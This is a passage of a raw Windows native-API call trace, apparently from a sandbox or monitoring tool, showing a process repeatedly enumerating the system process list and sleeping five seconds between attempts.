NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.570] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.671] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 